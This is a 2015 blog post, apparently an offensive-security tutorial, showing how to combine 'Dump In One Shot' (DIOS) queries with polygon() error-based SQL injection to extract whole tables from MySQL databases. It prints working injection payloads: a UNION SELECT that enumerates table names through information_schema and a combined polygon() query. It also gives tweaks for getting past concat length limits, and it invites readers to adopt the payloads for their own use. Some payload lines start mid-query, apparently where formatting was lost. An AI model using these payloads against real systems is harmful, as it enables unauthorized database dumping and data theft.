Thursday, 5 March 2015

Dumping all the polygons

DIOS for error based SQLi
I've been asked by a few people to provide DIOS (Dump In One Shot) examples for the newer method of error based SQLi against MySQL databases using the polygon() function. This post will quickly cover a generic example that can be adopted for your own use. If you do not know about error based SQLi you can read up my polygon() tutorial here.


You may already be familiar with DIOS, this is a method of dumping all rows of a table using just one line of SQL. Typically when doing SQLi you're limited to retrieving single strings in your modified query, these strings are inserted into the page content for example as an article headline or an author name. In order to dump lots of data using this method we have to concatenate all the fields we want to select into a single string, we quickly run into a problem when dumping large amounts of data where we reach the limit of the concat() and/or group_concat() functions - these limits are defined by the admin on the server but by default are only 1024 characters.
In order to bypass the limit of concat we can use user defined variables and keep appending individual rows from a table to the same variable and then simply select that variable as our result. I've explained this trick in great detail within the context of a union based SQLi attack vector here, I suggest you read this and become familiar with it first if you're new to DIOS.
The form of the original DIOS looks like this, it's just a fictional example for demonstration purposes, the red characters are the user supplied input. This query simply selects a list of tables names from information_schema.tables.
URL UNION SELECT 1,(select (@) from (select(@:=0x00),(select (@) from (information_schema.tables) where (table_schema>=@ and table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (@)in (@:=concat(@,0x0a,table_name))))x),3,4--
SELECT id, headline, news, author FROM news WHERE id = -51 UNION SELECT 1,(select (@) from (select(@:=0x00),(select (@) from (information_schema.tables) where (table_schema>=@ and table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (@)in (@:=concat(@,0x0a,table_name))))x),3,4--


Using the MySQL polygon() function we can do an error based SQLi attack, I've done another post on that here, again I suggest you read this attack in detail and become familiar with it first.
The form of the polygon() attack looks like this, again this is just an example.
URL * from (select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a)b))

Retrofitting DIOS for use with Polygon()

A na├»ve attempt to combine these together would to simply paste in the DIOS inside the inner most select of the Polygon() example, this will work however we need to make several modifications. First of all we cannot use the NULL character (0x00) when we declare and set our variable @, this will get turned from a DB NULL into a real NULL character in the output and cause the result to be blank, we can exchange this for another hex character, simply replace it with 0x01.
You might also have an issue with space in the output, for this you can reduce the amount of space taken up by any aliases you have assigned, simply assign blank aliases using '' (double apostrophe).
Our final query will look something like this when combined, I've given the DIOS part a blue colour and the red for the outer polygon() part of the select to make it easier to read. * from (select * from ((select (@) from (select(@:=0x01),(select (@) from (information_schema.tables) where (table_schema>=@ and table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (@) in (@:=concat(@,0x01,table_name))))x))a)b))
 Once again thanks to Benzi.